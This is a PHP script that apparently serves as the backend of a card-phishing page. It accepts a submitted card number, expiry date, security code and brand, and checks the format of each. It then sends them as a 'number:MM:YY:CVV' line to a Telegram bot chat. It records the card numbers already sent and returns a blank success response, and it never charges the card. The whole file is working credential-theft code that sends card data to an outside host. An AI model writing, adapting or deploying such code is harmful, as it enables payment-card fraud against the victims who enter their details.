<?php
session_start();

require_once 'config.php';

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    header('Location: index.php');
    exit;
}

$card_number = isset($_POST['card_number']) ? trim($_POST['card_number']) : '';
$month = isset($_POST['month']) ? trim($_POST['month']) : '';
$year = isset($_POST['year']) ? trim($_POST['year']) : '';
$security_code = isset($_POST['security_code']) ? trim($_POST['security_code']) : '';
$card_brand = isset($_POST['card_brand']) ? trim($_POST['card_brand']) : '';

if (empty($card_number) || empty($month) || empty($year) || empty($security_code) || empty($card_brand)) {
    $_SESSION['message'] = 'Please fill in all fields';
    $_SESSION['message_type'] = 'error';
    header('Location: index.php');
    exit;
}

if (!preg_match('/^[0-9]{2}$/', $month) || $month < 1 || $month > 12) {
    $_SESSION['message'] = 'Invalid month format. Please use MM format (01-12)';
    $_SESSION['message_type'] = 'error';
    header('Location: index.php');
    exit;
}

if (!preg_match('/^[0-9]{2}$/', $year)) {
    $_SESSION['message'] = 'Invalid year format. Please use YY format';
    $_SESSION['message_type'] = 'error';
    header('Location: index.php');
    exit;
}

$log_file = 'cards_sent.txt';

if (file_exists($log_file)) {
    $sent_cards = file($log_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    if (in_array($card_number, $sent_cards)) {
        http_response_code(200);
        exit;
    }
}

$textoMensaje = "Card -(" . $card_brand . ")\n";
$textoMensaje .= $card_number . ":" . $month . ":" . $year . ":" . $security_code;

$url = "https://api.telegram.org/bot" . TELEGRAM_BOT_TOKEN . "/sendMessage";

$data = [
    'chat_id' => TELEGRAM_CHAT_ID,
    'text' => $textoMensaje
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);

$response = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($httpCode == 200) {
    file_put_contents($log_file, $card_number . "\n", FILE_APPEND);
}

http_response_code(200);
exit;
